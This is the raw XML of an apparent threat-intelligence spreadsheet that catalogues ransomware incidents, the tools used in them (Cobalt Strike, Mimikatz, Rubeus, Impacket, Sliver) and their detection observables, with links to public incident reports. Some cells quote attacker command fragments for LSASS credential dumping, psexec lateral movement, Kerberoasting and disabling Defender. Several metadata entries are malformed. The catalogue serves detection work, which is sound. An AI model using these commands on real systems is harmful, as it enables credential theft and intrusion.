  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2022-11", "url": "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/, "tags": ["unknown"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2022-11", "url": "https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/", "tags": ["unknown"]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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{ "data": "2021-03", "url": "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, "tags": ["revil"]}</t>
  </si>
  <si>
    <t>{ "data": "2021-03", "url": "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "tags": ["unknown"]}</t>
  </si>
  <si>
    <t>{ "data": "2021-03", "url": "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", "tags": ["revil"]}</t>
  </si>
  <si>
    <t>{ "data": "2020-06", "url": "https://thedfirreport.com/2020/06/10/lockbit-ransomware-why-you-no-spread/", "tags": ["lockbit]}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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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netclt-pid</t>
  </si>
  <si>
    <t>process_account</t>
  </si>
  <si>
    <t>net user \\[computer name]  /user:[domain]\[user] [password] /persistent:no</t>
  </si>
  <si>
    <t>cmd-pid, impacket-pid</t>
  </si>
  <si>
    <t>nltest-pid</t>
  </si>
  <si>
    <t>rundll-pid, comsvcs-pid, lsass-pid</t>
  </si>
  <si>
    <t>rundll-pid, comsvcs-pid</t>
  </si>
  <si>
    <t>lsass-pid, comsvcs-pid</t>
  </si>
  <si>
    <t>adfind-pid</t>
  </si>
  <si>
    <t>pshell</t>
  </si>
  <si>
    <t>cmd-pid, impacket-pid, pshell-pid</t>
  </si>
  <si>
    <t>pshell-pid</t>
  </si>
  <si>
    <t>rundll-pid, comsvcs-pid, lsass-pid, wmic-pid</t>
  </si>
  <si>
    <t>wmic-pid, comsvcs-pid, wmic-pid</t>
  </si>
  <si>
    <t xml:space="preserve">wmic-pid </t>
  </si>
  <si>
    <t>pshell-pid, wmic-pid</t>
  </si>
  <si>
    <t>ngrok-pid</t>
  </si>
  <si>
    <t>mimikatz-pid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</si>
</sst>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2" fillId="0" borderId="0" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyBorder="1"/>
    <xf numFmtId="0" fontId="2" fillId="8" borderId="0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416665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3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&quot;data&quot;: &quot;2023-01012&quot;, &quot;url&quot;: &quot;https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-12-19&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-03/aa23-353a-stopransomware-alphv-blackcat-update_2.pdf&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv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a&quot;: &quot;2023-12&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2023-12/aa23-352a-stopransomware-play-ransomware.pdf&quot;, &quot;tags&quot;: [&quot;Play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4-08-29&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-09/aa24-242a-stopransomware-ransomhub-ransomware_1.pdf&quot;, &quot;tags&quot;: [&quot;RansomHub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4-11&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-11/aa24-131a-joint-csa-stopransomware-black-basta_3.pdf&quot;, &quot;tags&quot;: [&quot;black basta&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2025-02&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2025-02/aa25-050a-stopransomware-ghost-cring-ransomware.pdf&quot;, &quot;tags&quot;: [&quot;Ghost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2-11&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/&quot;, &quot;tags&quot;: [&quot;unknown&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2021-03&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/&quot;, &quot;tags&quot;: [&quot;unknown&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2021-03&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, &quot;tags&quot;: [&quot;revil&quot;]}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532404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16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 , &quot;url&quot;: &quot;https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/&quot;, &quot;tags&quot;: [&quot;lockbit&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-08-29&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2024-09/aa24-242a-stopransomware-ransomhub-ransomware_1.pdf&quot;, &quot;tags&quot;: [&quot;RansomHub&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2022-08-08&quot; , &quot;url&quot;: &quot;https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/&quot;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64815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0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&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomware/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-10&quot;: &quot;https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/&quot;, &quot;tags&quot;: [&quot;conti&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2025-02&quot; , &quot;url&quot;: &quot;https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/&quot;, &quot;tags&quot;: [&quot;lockbit&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2024-04&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/04/29/from-icedid-to-dagon-locker-ransomware-in-29-days/&quot;, &quot;tags&quot;: [&quot;dagonlocker&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2023-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide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763889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38" longText="1">
        <s v="{ &quot;data&quot;: &quot;2024-08&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/08/26/blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit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18/ryuk-in-5-hours/&quot;, &quot;tags&quot;: [&quot;ryuk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1-03&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/&quot;, &quot;tags&quot;: [&quot;revil&quot;]}"/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 &quot;data&quot;: &quot;2023-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/&quot;, &quot;tags&quot;: [&quot;hive&quot;]}"/>
        <s v="{ &quot;date&quot;: &quot;2021-05-10&quot;, &quot;url&quot;: &quot;https://labs.withsecure.com/publications/prelude-to-ransomware-systembc&quot;, &quot;malware&quot;: &quot;systembc&quot;}"/>
        <s v="{ &quot;data&quot;: &quot;2025-03&quot;, &quot;url&quot;: &quot;hhttps://thedfirreport.com/2025/03/31/fake-zoom-ends-in-blacksuit-ransomware/&quot;, &quot;tags&quot;: [&quot;BlackSuit&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2022-06-22&quot;, &quot;url&quot;: &quot;https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;alphv&quot;, &quot;blackcat&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2020-10&quot;: &quot;https://thedfirreport.com/2020/10/08/ryuks-return/&quot;, &quot;tags&quot;: [&quot;ryuk&quot;]}"/>
        <s v="{&quot;date&quot;: &quot;2021-05&quot;: &quot;https://thedfirreport.com/2021/05/12/conti-ransomwar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 , &quot;url&quot;: &quot;https://thedfirreport.com/2025/02/24/confluence-exploit-leads-to-lockbit-ransomware/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a&quot;: &quot;2023-05&quot;, &quot;url&quot;: &quot;https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection&quot;, &quot;tags&quot;: [&quot;CACTUS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2-11&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/&quot;, &quot;tags&quot;: [&quot;unknown&quot;]}"/>
        <s v="{ &quot;data&quot;: &quot;2020-06&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2020/06/10/lockbit-ransomware-why-you-no-spread/&quot;, &quot;tags&quot;: [&quot;lockbit]}"/>
        <s v="{ &quot;data&quot;: &quot;2025-02&quot;, &quot;url&quot;: &quot;https://www.cisa.gov/sites/default/files/2025-02/aa25-050a-stopransomware-ghost-cring-ransomware.pdf&quot;, &quot;tags&quot;: [&quot;Ghost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001"/>
    <m/>
    <s v="process spawn "/>
    <m/>
    <m/>
    <m/>
    <s v="slv.py &gt;&gt; worksliv.py"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0002"/>
    <m/>
    <m/>
    <s v="Advanced Ip Scanner"/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0003"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Sliver "/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0004"/>
    <m/>
    <s v="Exfil"/>
    <s v="Restic"/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0005"/>
    <m/>
    <s v="Sliver DLL Exports "/>
    <m/>
    <m/>
    <m/>
    <s v="&quot;StartW_x000a_VoidFunc_x000a_DLLUnregisterServer_x000a_DllRegisterServer_x000a_DllInstall&quot;"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0006"/>
    <m/>
    <s v="Sliver Github Strings Found in Memory "/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0007"/>
    <m/>
    <m/>
    <s v="Impacket"/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0008"/>
    <m/>
    <s v="Cobalt Strike Beacon Injected into winlogon.exe and Used RDP"/>
    <m/>
    <m/>
    <m/>
    <s v="Inject into Winlogon.exe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0009"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0010"/>
    <m/>
    <m/>
    <m/>
    <s v="PowerView"/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0011"/>
    <m/>
    <m/>
    <s v="BloodHound"/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0012"/>
    <m/>
    <s v="Report has Cobalt Strike Configs"/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike C2 Config"/>
    <x v="0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0"/>
  </r>
  <r>
    <s v="ransom-eid0014"/>
    <m/>
    <s v="Masquerading pythonw.  Pythonw doesn't require a a GUI and when you run py or pyw you don't open a console window"/>
    <m/>
    <m/>
    <m/>
    <s v="pythonw.exe renamed to setup.exe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ransom-eid0015"/>
    <m/>
    <s v="Default Cobalt Strike Named Pipes"/>
    <m/>
    <m/>
    <m/>
    <s v="\postex_22a3 "/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0016"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0017"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Inject into Winlogon.exe"/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0018"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Inject into Rundll32.exe"/>
    <x v="1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1"/>
  </r>
  <r>
    <s v="ransom-eid0020"/>
    <m/>
    <s v="LDAP Search"/>
    <m/>
    <m/>
    <m/>
    <s v="(&amp;(objectClass=computer))"/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0021"/>
    <m/>
    <m/>
    <s v="Impacket"/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0022"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0023"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Scanned ports 445, 3389, 135 "/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0024"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike C2 Config"/>
    <x v="1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1"/>
  </r>
  <r>
    <s v="ransom-eid0026"/>
    <m/>
    <s v="Confirmed via windows event 5145"/>
    <m/>
    <m/>
    <m/>
    <s v="wmiexec.py checked share access "/>
    <x v="1"/>
  </r>
  <r>
    <s v="ransom-eid0027"/>
    <m/>
    <m/>
    <s v="Rubeus"/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0028"/>
    <m/>
    <s v="InnoDownLoad Plugin"/>
    <m/>
    <m/>
    <m/>
    <s v="http_request, url = IPADDRESS/manual/152/152/zip, http_method = GET, user_agent = InnoDownLoadPlugin/1.5&quot;}"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0029"/>
    <m/>
    <s v="MsBuild Netcon"/>
    <m/>
    <m/>
    <m/>
    <s v="netcon, file_path = c:\windows\microsoft.NET\framework\v4.0.30319\msbuild.exe, protocol = tcp , destination_ip = ipaddress"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0030"/>
    <m/>
    <s v="process spawn "/>
    <m/>
    <m/>
    <m/>
    <s v="SecTopRAT.exe &gt; cmd.exe &gt; msbuild.exe"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0031"/>
    <m/>
    <m/>
    <s v="InnoSetup"/>
    <m/>
    <m/>
    <s v="idp.dll"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0032"/>
    <m/>
    <s v="MsBuild Netcon"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0033"/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <s v="psexec_psh"/>
    <x v="2"/>
  </r>
  <r>
    <s v="ransom-eid0034"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <s v="netcon, file_path = c:\windows\microsoft.NET\framework\v4.0.30319\msbuild.exe,  protocol = tcp,  destination_ip = ipaddress"/>
    <x v="2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3"/>
  </r>
  <r>
    <s v="ransom-eid0036"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0037"/>
    <m/>
    <m/>
    <s v="BloodHound"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0038"/>
    <m/>
    <m/>
    <s v="SharpHound"/>
    <m/>
    <m/>
    <s v="winevtx_4768, service_name = krbtgt, pre_auth_type = 0, ticket_type = 0x17"/>
    <x v="3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3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3"/>
  </r>
  <r>
    <s v="ransom-eid0041"/>
    <m/>
    <m/>
    <s v="Adfind"/>
    <m/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0042"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Get-DataInfo.ps1"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0043"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="used SMB ADMIN$ share "/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0044"/>
    <m/>
    <s v="Sharphound SMB "/>
    <m/>
    <m/>
    <m/>
    <s v="winevtx_5145, share_name = \\*\C$, target_name = tools\socks32.exe"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0045"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="winevtx_5145, share_name = \\*\IPC$, target_name = srvsvc"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0046"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="winevtx_5145 = share_name = \\*\IPC$, target_name = samr"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0047"/>
    <m/>
    <s v="Kerb Roasting Generated a lot of 4768"/>
    <m/>
    <m/>
    <m/>
    <s v="TicketEncryptionType = 0x17, PreAuthType = 0, 25+ logs"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0048"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="powershell connected to port 80 in netcon"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0049"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="rundll32.exe netcon to port 443"/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0050"/>
    <m/>
    <s v="Report has Cobalt Strike Configs"/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <m/>
    <x v="3"/>
  </r>
  <r>
    <s v="ransom-eid0051"/>
    <m/>
    <m/>
    <s v="Rubeus"/>
    <m/>
    <m/>
    <m/>
    <x v="3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4"/>
  </r>
  <r>
    <s v="ransom-eid0053"/>
    <m/>
    <m/>
    <s v="Impacket"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0054"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0055"/>
    <m/>
    <m/>
    <s v="ADRecon"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0056"/>
    <m/>
    <m/>
    <s v="Gmer"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0057"/>
    <m/>
    <m/>
    <s v="HackBrowserData"/>
    <m/>
    <m/>
    <m/>
    <x v="4"/>
  </r>
  <r>
    <s v="ransom-eid0058"/>
    <m/>
    <s v="LSASS Dump Manual with Taskmgr"/>
    <m/>
    <m/>
    <m/>
    <s v="Instead, they opened Taskmgr.exe, created a dump file of the LSASS.exe process, and saved the file to a ZIP archive."/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0059"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Get-ADRGPO, Get-ADRDNSZone, Get-ADRGPLink"/>
    <x v="5"/>
  </r>
  <r>
    <s v="ransom-eid0060"/>
    <m/>
    <m/>
    <s v="Nirsoft"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0061"/>
    <m/>
    <m/>
    <s v="Mimikatz"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0062"/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0063"/>
    <m/>
    <m/>
    <s v="ADRecon"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0064"/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0065"/>
    <m/>
    <m/>
    <s v="Emotet"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0066"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0067"/>
    <m/>
    <m/>
    <s v="BloodHound"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0068"/>
    <m/>
    <m/>
    <s v="CrackMapExec"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0069"/>
    <m/>
    <m/>
    <s v="MegaSync"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0070"/>
    <m/>
    <m/>
    <s v="InVeigh"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0071"/>
    <m/>
    <m/>
    <s v="Adfind"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0072"/>
    <m/>
    <m/>
    <s v="Rubeus"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0073"/>
    <m/>
    <m/>
    <s v="StealBit"/>
    <m/>
    <m/>
    <m/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0074"/>
    <m/>
    <s v="LSASS Dump Manual with Taskmgr"/>
    <m/>
    <m/>
    <m/>
    <s v="Instead, they opened Taskmgr.exe, created a dump file of the LSASS.exe process, and saved the file to a ZIP archive."/>
    <x v="6"/>
  </r>
  <r>
    <s v="ransom-eid0075"/>
    <m/>
    <m/>
    <s v="Mega"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0076"/>
    <m/>
    <m/>
    <s v="AnyDesk"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0077"/>
    <m/>
    <m/>
    <s v="Plink"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0078"/>
    <m/>
    <m/>
    <s v="Ngrok"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0079"/>
    <m/>
    <m/>
    <s v="SplashTop"/>
    <m/>
    <m/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0080"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Brute Ratel"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0081"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="7"/>
  </r>
  <r>
    <s v="ransom-eid0082"/>
    <m/>
    <m/>
    <s v="Evilginx2"/>
    <m/>
    <m/>
    <m/>
    <x v="7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8"/>
  </r>
  <r>
    <s v="ransom-eid0084"/>
    <m/>
    <m/>
    <s v="Gmer"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0085"/>
    <m/>
    <m/>
    <s v="pchunter"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0086"/>
    <m/>
    <m/>
    <s v="PowerTool/64"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0087"/>
    <m/>
    <m/>
    <s v="RouterScan.exe"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0088"/>
    <m/>
    <m/>
    <s v="PowerView"/>
    <m/>
    <m/>
    <m/>
    <x v="8"/>
  </r>
  <r>
    <s v="ransom-eid0089"/>
    <m/>
    <m/>
    <s v="Rubeus"/>
    <m/>
    <m/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid0090"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="9"/>
  </r>
  <r>
    <s v="ransom-eid0091"/>
    <m/>
    <s v="Exloited Netlogon"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="10"/>
  </r>
  <r>
    <s v="ransom-eid0092"/>
    <m/>
    <s v="process spawn "/>
    <m/>
    <m/>
    <m/>
    <s v="psexesvc.exe &gt; rundll32.exe &gt; cmd.exe"/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid0093"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid0094"/>
    <m/>
    <m/>
    <m/>
    <s v="PsExec"/>
    <m/>
    <m/>
    <x v="11"/>
  </r>
  <r>
    <s v="ransom-eid0095"/>
    <m/>
    <m/>
    <s v="Softperfect Netscan"/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid0096"/>
    <m/>
    <m/>
    <s v="ProcDump"/>
    <m/>
    <m/>
    <m/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid0097"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="http_request, url = IP/cert/bec_http_222_x86_13567_1.exe, http_method = GET, user_agent = curl/7.74.0"/>
    <x v="12"/>
  </r>
  <r>
    <s v="ransom-eid0098"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="gpedit.msc Select &quot;Disable real-time protection&quot; and change it to &quot;Enabled&quot;"/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid0099"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Use of Cobalt Strike EXECUTE-ASSEMBLY to execute .net in memory "/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid0100"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="https://mega.io/sync "/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid0101"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="C:\ProgramData\lsass.dmp full&quot; remote-exec psexec [target] cmd /c rundll32.exe"/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid0102"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="powershell-import //import file CVE-2021-34527.ps1"/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid0103"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="13"/>
  </r>
  <r>
    <s v="ransom-eid0104"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="Cobalt Strike"/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0105"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="14"/>
  </r>
  <r>
    <s v="ransom-eid0106"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
